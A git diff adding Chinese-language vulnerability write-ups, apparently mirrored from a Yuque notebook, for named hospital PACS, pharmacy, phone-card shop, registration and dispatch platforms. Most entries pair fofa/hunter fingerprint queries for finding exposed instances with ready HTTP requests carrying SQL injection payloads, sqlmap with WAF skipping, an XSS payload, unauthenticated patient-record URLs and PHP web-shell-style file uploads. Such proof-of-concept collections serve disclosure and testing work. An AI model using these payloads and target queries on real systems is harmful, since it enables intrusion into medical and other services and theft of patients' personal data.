+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imp="http://imp.nzz.ws.manager.cdxt.com/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <imp:getContract>
+         <!--type: string-->
+         <arg0>gero et</arg0>
+      </imp:getContract>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1700650531584-d9202bd2-3b4c-4680-8f6f-540bbd12bd17.png](./img/KK9xFI075kSNF6Fs/1700650531584-d9202bd2-3b4c-4680-8f6f-540bbd12bd17-060263.png)
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tn4e1b9rtiep13x8>
\ No newline at end of file
diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md
new file mode 100644
index 0000000..e104615
--- /dev/null
+++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞
+
+# 一、漏洞简介
+成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园，在国内医疗软件行业中率先采用Java技术，融入国际国内标准，整体设计，持续研发，先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品，全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)dabh存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)
+
+# 三、特征
+![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/SVgl4MzaEBYH3VYX/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-874139.png)
+
+# 四、漏洞复现
+```plain
+/XtWebPacsASp/XTWebPacsGetJcbgByDabh.asp?dabh=1
+```
+
+![1700651304147-bb52a220-c2d7-4841-af18-c0e7aec6ef2a.png](./img/SVgl4MzaEBYH3VYX/1700651304147-bb52a220-c2d7-4841-af18-c0e7aec6ef2a-114819.png)
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oq3n3kbupmwuhibq>
\ No newline at end of file
diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md
new file mode 100644
index 0000000..bc60b92
--- /dev/null
+++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞
+
+# 一、漏洞简介
+成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园，在国内医疗软件行业中率先采用Java技术，融入国际国内标准，整体设计，持续研发，先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品，全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)edtJclx存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)
+
+# 三、特征
+![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/YR1LQosHaWEWoTsy/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-934372.png)
+
+# 四、漏洞复现
+```plain
+POST /JcbgForYsz/Show_Jcbg_Ysz.asp HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 162
+Connection: close
+Cookie: ASPSESSIONIDCSBBQDTQ=KAJHGCOCOODELKOELMFGEMMK
+Upgrade-Insecure-Requests: 1
+
+edtJclx=%A3%C2%D0%CD%B3%AC%C9%F9&edtQsrq=2023-10-17&edtJsrq=2023-10-17&edtBgzt=%D2%D1%D4%A4%D4%BC&edtZwxm=&edtSjks=%B1%BE%D4%BA%CC%E5%BC%EC&edtSubmit=%B2%E9%D1%AF
+```
+
+![1700651676241-d3392ad1-f0ea-486a-a6fa-50b796736354.png](./img/YR1LQosHaWEWoTsy/1700651676241-d3392ad1-f0ea-486a-a6fa-50b796736354-334387.png)
+
+
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cggv50rtx7k19pah>
\ No newline at end of file
diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞.md
new file mode 100644
index 0000000..9f08e39
--- /dev/null
+++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞.md
@@ -0,0 +1,30 @@
+# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞
+
+# 一、漏洞简介
+成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园，在国内医疗软件行业中率先采用Java技术，融入国际国内标准，整体设计，持续研发，先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品，全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在XSS跨站脚本漏洞。
+
+# 二、影响版本
++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)
+
+# 三、特征
+![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/rrHqPXIKH46qSxgA/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-836936.png)
+
+# 四、漏洞复现
+漏洞位置
+
+```plain
+/JcbgForYsz/Show_Jcbg_Ysz.asp
+```
+
+1. 在姓名处插入如下payload：`test"><script>alert("XSS")</script>`
+
+![1700651459328-174f0fec-121d-4ec8-9787-77be487b9e62.png](./img/rrHqPXIKH46qSxgA/1700651459328-174f0fec-121d-4ec8-9787-77be487b9e62-804740.png)
+
+2. 点击查询，成功触发：
+
+![1700651521093-e0cef71d-5ae0-42d3-886b-78b0bb847be8.png](./img/rrHqPXIKH46qSxgA/1700651521093-e0cef71d-5ae0-42d3-886b-78b0bb847be8-116149.png)	
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qno6ghgn37fbk4dg>
\ No newline at end of file
diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md
new file mode 100644
index 0000000..300a169
--- /dev/null
+++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md
@@ -0,0 +1,24 @@
+# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞
+
+# 一、漏洞简介
+成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园，在国内医疗软件行业中率先采用Java技术，融入国际国内标准，整体设计，持续研发，先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品，全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞，攻击者可通过该漏洞获取病人敏感个人信息。
+
+# 二、影响版本
++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)
+
+# 三、特征
+![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/x4f4ob5WjwPleqb3/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-670797.png)
+
+# 四、漏洞复现
+可通过遍历`dabh`参数获取敏感信息
+
+```plain
+/XtWebPacsASp/XTWebPacsGetJcbgByDabh.asp?dabh=1
+```
+
+![1700651190860-700100b3-eeeb-4a3d-b6d1-dae525636f57.png](./img/x4f4ob5WjwPleqb3/1700651190860-700100b3-eeeb-4a3d-b6d1-dae525636f57-945427.png)
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/il1v7mdgbkmg93tx>
\ No newline at end of file
diff --git a/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md
new file mode 100644
index 0000000..ce065e9
--- /dev/null
+++ b/成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md
@@ -0,0 +1,22 @@
+# 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞
+
+# 一、漏洞简介
+成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园，在国内医疗软件行业中率先采用Java技术，融入国际国内标准，整体设计，持续研发，先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品，全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞，攻击者可通过该漏洞获取病人敏感个人信息。
+
+# 二、影响版本
++ 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)
+
+# 三、特征
+![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/0-avbnMa_PzLrg3f/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-854837.png)
+
+# 四、漏洞复现
+```plain
+/JcbgForYsz/Show_Jcbg_Ysz.asp
+```
+
+![1700651024018-1df5dcd8-f8c7-4a87-b1f4-07ccd9574c98.png](./img/0-avbnMa_PzLrg3f/1700651024018-1df5dcd8-f8c7-4a87-b1f4-07ccd9574c98-791553.png)
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qh4xl88f5hzvc3bi>
\ No newline at end of file
diff --git a/成都海翔软件有限公司海翔药业云平台存在sql注入.md b/成都海翔软件有限公司海翔药业云平台存在sql注入.md
new file mode 100644
index 0000000..c68a91c
--- /dev/null
+++ b/成都海翔软件有限公司海翔药业云平台存在sql注入.md
@@ -0,0 +1,47 @@
+# 成都海翔软件有限公司海翔药业云平台存在 sql 注入
+
+# 一、漏洞简介
+成都海翔软件有限公司海翔药业云平台存在 sql 注入
+
+# 二 、影响版本
++ 海翔药业云平台
+
+# 三、资产测绘
++ hunter`web.title="登录海翔"`
++ 特征
+
+![1699025804921-a9adab4f-2528-45d0-8719-7d93e41f497d.png](./img/Ae4tpd8OCz3U9rwy/1699025804921-a9adab4f-2528-45d0-8719-7d93e41f497d-192125.png)
+
+# 四、漏洞复现
+漏洞位置，搜索账套处
+
+![1699025926526-01196046-54a6-4f7e-8f35-13d9b5990117.png](./img/Ae4tpd8OCz3U9rwy/1699025926526-01196046-54a6-4f7e-8f35-13d9b5990117-268568.png)
+
+```plain
+POST /getylist_login.do HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 13
+Connection: close
+Cookie: JSESSIONID=CC105C5EED7D5DE8BFCB92D7F4BB74DC; __session:0.5376174871119012:=http:
+
+accountname=1
+```
+
+sqlmap
+
+```plain
+sqlmap -r 1.txt  --skip-waf --batch
+```
+
+![1699025944666-82311c81-9823-4e94-997d-0d8ba7c32ca1.png](./img/Ae4tpd8OCz3U9rwy/1699025944666-82311c81-9823-4e94-997d-0d8ba7c32ca1-162460.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bn1l8e2pqvvd28hg>
\ No newline at end of file
diff --git a/手机卡号推广商城ssk存在SQL注入漏洞.md b/手机卡号推广商城ssk存在SQL注入漏洞.md
new file mode 100644
index 0000000..f404f49
--- /dev/null
+++ b/手机卡号推广商城ssk存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# 手机卡号推广商城ssk存在SQL注入漏洞
+
+# 一、漏洞简介
+ 手机卡号推广商城是一个在线平台，提供手机卡号销售、号码推广、套餐介绍、安全保障和售后服务等功能，满足用户对手机卡号的需求，为用户提供便利的服务体验。 手机卡号推广商城 login.php接口处存在 SQL 注入漏洞，恶意攻击者可能会利用此漏洞修改数据库中的数据，例如添加、删除或修改记录，导致数据损坏或丢失。
+
+# 二、影响版本
++ 手机卡号推广商城
+
+# 三、资产测绘
++ fofa`body="zgdx.php"`
++ 特征
+
+![1715176303991-c852989c-d754-4c4a-8f26-6bde61362c67.png](./img/TZ56b5Nh8Wr31Cat/1715176303991-c852989c-d754-4c4a-8f26-6bde61362c67-390785.png)
+
+ 手机卡号推广商城是一个在线平台，提供手机卡号销售、号码推广、套餐介绍、安全保障和售后服务等功能，满足用户对手机卡号的需求，为用户提供便利的服务体验。  
+
+# 四、漏洞复现
+```http
+POST /ssk/login.php HTTP/1.1
+Host: 
+Content-Length: 199
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+username=' OR (SELECT 5126 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(5126=5126,1))),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tyft&password=123123
+```
+
+![1715178848654-441442f8-e1fe-4d1a-bf55-eb7b8fd2aac6.png](./img/TZ56b5Nh8Wr31Cat/1715178848654-441442f8-e1fe-4d1a-bf55-eb7b8fd2aac6-592450.png)
+
+```http
+qjjjq1qxkzq1
+```
+
+sqlmap
+
+```http
+POST /ssk/login.php HTTP/1.1
+Host: 
+Content-Length: 199
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+username=&password=123123
+```
+
+![1715178886524-70e83ac2-67e8-47a8-a53e-99049d34e5c4.png](./img/TZ56b5Nh8Wr31Cat/1715178886524-70e83ac2-67e8-47a8-a53e-99049d34e5c4-472915.png)
+
+
+
+> 更新: 2024-05-09 11:09:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xwfc57fpx7o7dqr8>
\ No newline at end of file
diff --git a/挂号系统login.php存在SQL注入漏洞.md b/挂号系统login.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..be8ae2e
--- /dev/null
+++ b/挂号系统login.php存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+# 挂号系统login.php存在SQL注入漏洞
+
+# 一、漏洞简介
+挂号系统存在SQL注入，可能导致数据库信息泄露、恶意数据库操作
+
+# 二、资产测绘
+```plain
+body="res/img/ht_box_back.gif" || body="/res/img/ht_box_top.gif" || body="/res/img/ht_box_bottom.gif" || body="dom_loaded.load(init);"
+```
+
+![1715188160121-e62854f9-b160-425b-821a-fd1b5485ce71.png](./img/F-XmhV62ILsZoyLF/1715188160121-e62854f9-b160-425b-821a-fd1b5485ce71-639679.png)
+
+## 三、漏洞复现
+```http
+POST /m/login.php?op=login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+Content-Type: application/x-www-form-urlencoded
+x-forwarded-for: 127.0.0.1 'and exists(select * from mysql)-- 123
+
+username=admin&password=admin&vcode=4997&to=&vcode_hash=03b498138c14b2d0515b5438808d6604
+```
+
+![1715224720711-eda57077-d9d0-466c-92d0-c91de443dbc9.png](./img/F-XmhV62ILsZoyLF/1715224720711-eda57077-d9d0-466c-92d0-c91de443dbc9-087014.png)
+
+**<font style="color:#DF2A3F;">注入为insert类型，请勿使用sqlmap</font>**
+
+
+
+> 更新: 2024-05-09 11:20:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yfrf96eoc8tgqfau>
\ No newline at end of file
diff --git a/指挥调度平台ajax_users存在SQL注入漏洞.md b/指挥调度平台ajax_users存在SQL注入漏洞.md
new file mode 100644
index 0000000..84e6dbd
--- /dev/null
+++ b/指挥调度平台ajax_users存在SQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 指挥调度平台ajax_users存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台ajax_users存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 指挥调度平台
+
+# 三、资产测绘
++ hunter`web.body="app/structure/departments.php"`
++ 特征
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/bIUf__mIbiystGtX/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-579205.png)
+
+# 四、漏洞复现
+```http
+POST /app/ext/ajax_users.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+ 
+dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL-- -
+```
+
+![1715267670568-c3055dcd-a14d-4de9-bdf2-231701685779.png](./img/bIUf__mIbiystGtX/1715267670568-c3055dcd-a14d-4de9-bdf2-231701685779-804715.png)
+
+```http
+e10adc3949ba59abbe56e057f20f883
+```
+
+
+
+
+
+> 更新: 2024-05-10 15:30:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qmfywxxk17pr7xs3>
\ No newline at end of file
diff --git a/指挥调度平台client_upload存在任意文件上传漏洞.md b/指挥调度平台client_upload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..7e24623
--- /dev/null
+++ b/指挥调度平台client_upload存在任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+# 指挥调度平台client_upload存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台client_upload存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 指挥调度平台
+
+# 三、资产测绘
++ hunter`web.body="app/structure/departments.php"`
++ 特征
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/4sD9krRQUS7aBGa8/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-720140.png)
+
+# 四、漏洞复现
+```plain
+POST /api/client/upload.php HTTP/1.1
+Host: {hostname}
+Content-Length: 180
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundarySwvD8hSn3Z0sHfMu
+Content-Disposition: form-data; name="ulfile";filename="1.php"
+Content-Type: image/png
+
+<?php echo 111*111;?>
+------WebKitFormBoundarySwvD8hSn3Z0sHfMu--
+```
+
+![1704270269821-29e1c7ea-5a61-4f0e-a068-e4414af808be.png](./img/4sD9krRQUS7aBGa8/1704270269821-29e1c7ea-5a61-4f0e-a068-e4414af808be-125035.png)
+
+上传文件位置
+
+```plain
+/upload/1.php
+```
+
+![1704270300936-e64326f0-0b9a-45c3-b5b2-a93fea878bcc.png](./img/4sD9krRQUS7aBGa8/1704270300936-e64326f0-0b9a-45c3-b5b2-a93fea878bcc-849516.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cqbzid7u7knls8bl>
\ No newline at end of file
diff --git a/指挥调度平台event_uploadfile存在任意文件上传漏洞.md b/指挥调度平台event_uploadfile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..ff6607f
--- /dev/null
+++ b/指挥调度平台event_uploadfile存在任意文件上传漏洞.md
@@ -0,0 +1,47 @@
+# 指挥调度平台event_uploadfile存在任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台event_uploadfile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 指挥调度平台
+
+# 三、资产测绘
++ hunter`web.body="app/structure/departments.php"`
++ 特征
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/ojv9dkJApB3BJyaT/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-308583.png)
+
+# 四、漏洞复现
+```plain
+POST /api/client/event/uploadfile.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
+Connection: close
+Content-Length: 179
+Content-Type: multipart/form-data; boundary=htu3qcyui73l2jtyqwnk
+Accept-Encoding: gzip, deflate
+
+--htu3qcyui73l2jtyqwnk
+Content-Disposition: form-data; name="uploadfile"; filename="stc.php"
+Content-Type: image/jpeg
+
+<?php echo 111*111;?>
+--htu3qcyui73l2jtyqwnk--
+
+```
+
+![1701096805339-6c486035-e40d-4fa4-a928-29e83b27b7b7.png](./img/ojv9dkJApB3BJyaT/1701096805339-6c486035-e40d-4fa4-a928-29e83b27b7b7-231504.png)
+
+上传文件位置
+
+```plain
+/upload/event/ccc78e2b-5e61-49c0-9050-3a29687b2e81.php
+```
+
+![1701096849479-93ad2b75-2bba-47cd-a3eb-30b49de88bb3.png](./img/ojv9dkJApB3BJyaT/1701096849479-93ad2b75-2bba-47cd-a3eb-30b49de88bb3-235066.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/llu0mvvzuhvpu9ag>
\ No newline at end of file
diff --git a/指挥调度平台get_gis_fence_warning存在SQL注入漏洞.md b/指挥调度平台get_gis_fence_warning存在SQL注入漏洞.md
new file mode 100644
index 0000000..5c5de4d
--- /dev/null
+++ b/指挥调度平台get_gis_fence_warning存在SQL注入漏洞.md
@@ -0,0 +1,63 @@
+# 指挥调度平台get_gis_fence_warning存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台get_gis_fence_warning存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 指挥调度平台
+
+# 三、资产测绘
++ hunter`web.body="app/structure/departments.php"`
++ 特征
+
+![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/BGHJmd0Vs536cinb/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-858315.png)
+
+# 四、漏洞复现
+```plain
+POST /api/client/get_gis_fence_warning.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=7d1e1db182a16e0508fda0961e9a0f6d
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 138
+
+usernumber=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707a71,IFNULL(CAST(111*111 AS CHAR),0x20),0x7162707671),NULL,NULL,NULL,NULL,NULL-- -
+```
+
+![1705368432160-49c93ef1-c200-4953-984d-7ebffe2c4705.png](./img/BGHJmd0Vs536cinb/1705368432160-49c93ef1-c200-4953-984d-7ebffe2c4705-770391.png)
+
+```plain
+qbpzq12321qbpvq
+```
+
+sqlmap
+
+```plain
+POST /api/client/get_gis_fence_warning.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=7d1e1db182a16e0508fda0961e9a0f6d
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 138
+
+usernumber=1
+```
+
+![1705368573688-a697002f-062d-4ea4-88d1-c7e68407ba75.png](./img/BGHJmd0Vs536cinb/1705368573688-a697002f-062d-4ea4-88d1-c7e68407ba75-867695.png)
+
+[福建科立讯通信-指挥调度平台-get-gis-fence-warning-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222143857-625cde56-ac55-4d9f-83ab-c5df6957533e.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/arehbbh2c0r4whc1>
\ No newline at end of file
diff --git a/指挥调度平台invite2videoconf存在远程命令执行漏洞.md b/指挥调度平台invite2videoconf存在远程命令执行漏洞.md
new file mode 100644
index 0000000..e05b839
--- /dev/null
+++ b/指挥调度平台invite2videoconf存在远程命令执行漏洞.md
@@ -0,0 +1,46 @@
+# 指挥调度平台invite2videoconf存在远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案，以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能，可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台invite2videoconf存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>`
++ <font style="color:rgb(51, 51, 51);">特征</font>
+
